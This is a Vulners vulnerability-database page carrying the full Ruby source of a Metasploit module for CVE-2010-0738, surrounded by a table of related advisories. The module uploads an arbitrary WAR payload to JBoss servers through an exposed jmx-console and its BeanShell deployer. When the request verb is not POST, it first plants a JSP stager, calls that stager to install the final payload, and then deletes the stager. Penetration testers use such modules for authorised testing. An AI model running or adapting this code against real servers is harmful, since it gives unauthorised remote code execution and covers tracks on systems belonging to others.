Vulners
Lucene search
JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
🗓️ 18 Jul 2014 09:51:46Reported by us3r777 <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 66 Views
| Reporter | Title | Published | Views | Family All 83 |
|---|---|---|---|---|
 | JBoss, JMX Console, misconfigured DeploymentScanner | 2 Oct 201100:00 | – | zdt |
| Hewlett-Packard UCMDB 10.10 JMX-Console Authentication Bypass Vulnerability | 4 Feb 201500:00 | – | zdt |
 | JBoss EAP < 4.2.0.CP09 / 4.3.0.CP08 Multiple Vulnerabilities | 29 Apr 201000:00 | – | nessus |
| HP-UX PHSS_42328 : s700_800 11.X OV NNM9.00 NNM 9.0x Patch 5 | 6 Mar 201200:00 | – | nessus |
| JBoss Enterprise Application Platform '/jmx-console' Authentication Bypass | 8 Apr 201100:00 | – | nessus |
| Juniper Junos Space < 13.3R1.8 Multiple Vulnerabilities (JSA10627) | 22 Dec 201400:00 | – | nessus |
| RHEL 4 : JBoss EAP (RHSA-2010:0376) | 24 Jan 201300:00 | – | nessus |
| RHEL 4 : JBoss EAP (RHSA-2010:0377) | 24 Jan 201300:00 | – | nessus |
| RHEL 5 : JBoss EAP (RHSA-2010:0378) | 24 Jan 201300:00 | – | nessus |
| RHEL 5 : JBoss Enterprise Application Platform 4.3.0.CP08 update (Critical) (RHSA-2010:0379) | 24 Jan 201300:00 | – | nessus |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::JBoss
def initialize
super(
'Name' => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment',
'Description' => %q{
This module can be used to install a WAR file payload on JBoss servers that have
an exposed "jmx-console" application. The payload is put on the server by
using the jboss.system:BSHDeployer's createScriptDeployment() method.
},
'Author' => [
'us3r777 <us3r777[at]n0b0.so>'
],
'References' => [
[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
[ 'OSVDB', '64171' ],
[ 'URL', 'https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now' ],
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ]
],
'Actions' => [
['Deploy', { 'Description' => 'Create and deploy app (WAR) to deliver payload' }],
['Undeploy', { 'Description' => 'Remove app (WAR) for cleanup' }]
],
'DefaultAction' => 'Deploy',
'License' => BSD_LICENSE,
)
register_options(
[
Opt::RPORT(8080),
OptString.new('APPBASE', [ true, 'Application base name', 'payload']),
OptPath.new('WARFILE', [ false, 'The WAR file to deploy'])
]
)
end
def deploy_action(app_base, war_data)
encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
if http_verb == 'POST'
print_status('Deploying payload...')
opts = {
file: "#{app_base}.war",
contents: encoded_payload
}
else
print_status('Deploying stager...')
stager_name = Rex::Text.rand_text_alpha(rand(8..15))
stager_contents = stager_jsp(app_base)
opts = {
dir: "#{stager_name}.war",
file: "#{stager_name}.war/#{stager_name}.jsp",
contents: Rex::Text.encode_base64(stager_contents).gsub(/\n/, '')
}
end
bsh_payload = generate_bsh(:create, opts)
package = deploy_bsh(bsh_payload)
if package.nil?
print_error('Deployment failed')
return
else
print_good('Deployment successful')
end
unless http_verb == 'POST'
# call the stager to deploy our real payload war
stager_uri = '/' + stager_name + '/' + stager_name + '.jsp'
payload_data = "#{Rex::Text.rand_text_alpha(rand(8..15))}=#{Rex::Text.uri_encode(encoded_payload)}"
print_status("Calling stager #{stager_uri} to deploy final payload...")
res = deploy('method' => 'POST',
'data' => payload_data,
'uri' => stager_uri)
if res && res.code == 200
print_good('Payload deployed')
else
print_error('Failed to deploy final payload')
end
# Remove the stager
print_status('Removing stager...')
files = {}
files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp"
files[:stager_base] = "#{stager_name}.war"
delete_script = generate_bsh(:delete, files)
res = deploy_package(delete_script, package)
if res.nil?
print_error('Unable to remove Stager')
else
print_good('Stager successfully removed')
end
end
end
def undeploy_action(app_base)
# Undeploy the WAR and the stager if needed
print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...")
files = {}
files[:app_base] = "#{app_base}.war"
delete_script = generate_bsh(:delete, files)
package = deploy_bsh(delete_script)
if package.nil?
print_error('Unable to remove WAR')
else
print_good('Successfully removed')
end
end
def run
app_base = datastore['APPBASE']
case action.name
when 'Deploy'
unless datastore['WARFILE'] && File.exist?(datastore['WARFILE'])
print_error('WAR file not found')
return
end
war_data = File.read(datastore['WARFILE'], mode: 'rb')
deploy_action(app_base, war_data)
when 'Undeploy'
undeploy_action(app_base)
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Feb 2023 14:30Current
5.6Medium risk
Vulners AI Score5.6
CVSS 25
CVSS 3.15.3
EPSS0.79415